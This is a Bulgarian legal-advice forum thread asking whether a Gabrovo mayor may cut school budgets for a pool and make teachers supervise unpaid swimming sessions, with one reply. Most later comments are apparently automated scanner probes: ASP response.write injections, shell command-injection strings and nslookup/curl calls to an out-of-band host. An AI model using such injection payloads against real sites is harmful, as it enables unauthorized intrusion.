Класният ръководител, като бавачка

30.04.2011г. 07:25:01
В началото на КАЛЕНДАРНАТА година кметът на Габрово намали бюджета на общинските училища с 1,5% за да финансира плувния басейн в ПМГ - законно ли е това? Измисли извънкласна дейност за децата плуване, по желание на ученика, която не фигурира в образец 1, както и в ДОИ. Въпреки, че децата се придружават от родител/часовете са от 16 до 18 часа в петък/, нареди на директорите на общинските училища да определят ръководители, които да присъстват на занятията - законно ли е ? Когато се появи ръководителят му се дава да подпише документ, че ще отговаря за материалната база и живота на децата - редно ли е ? Дейността на учителя не се заплаща - правилно ле е ? Посочете, моля нопмативните документи, на които да се опрем за да потърсим правата си?

Правни мнения, съвети и коментари

23.07.2020г. 12:53
Ако се касае за дейност извън задълженията на учителя съгласно трудовия му договор, е необходимо същата да бъде допълнително заплатена.
lxbfYeaa
05.10.2023г. 07:29
response.write(9416797*9469802)
lxbfYeaa
05.10.2023г. 07:29
'+response.write(9416797*9469802)+'
lxbfYeaa
05.10.2023г. 07:29
"+response.write(9416797*9469802)+"
lxbfYeaa
05.10.2023г. 07:29
echo ixfodf$()\ hbgfof\nz^xyu||a #' &echo ixfodf$()\ hbgfof\nz^xyu||a #|" &echo ixfodf$()\ hbgfof\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:29
&echo dwhsen$()\ hygphz\nz^xyu||a #' &echo dwhsen$()\ hygphz\nz^xyu||a #|" &echo dwhsen$()\ hygphz\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:29
|echo stxyjo$()\ towhqz\nz^xyu||a #' |echo stxyjo$()\ towhqz\nz^xyu||a #|" |echo stxyjo$()\ towhqz\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:29
(nslookup -q=cname hitoewgdgweslaaed9.bxss.me||curl hitoewgdgweslaaed9.bxss.me))
lxbfYeaa
05.10.2023г. 07:29
$(nslookup -q=cname hittasylnaytdb6a82.bxss.me||curl hittasylnaytdb6a82.bxss.me)
lxbfYeaa
05.10.2023г. 07:29
&nslookup -q=cname hitrsbegpgplf47b2a.bxss.me&'\"`0&nslookup -q=cname hitrsbegpgplf47b2a.bxss.me&`'

Коментар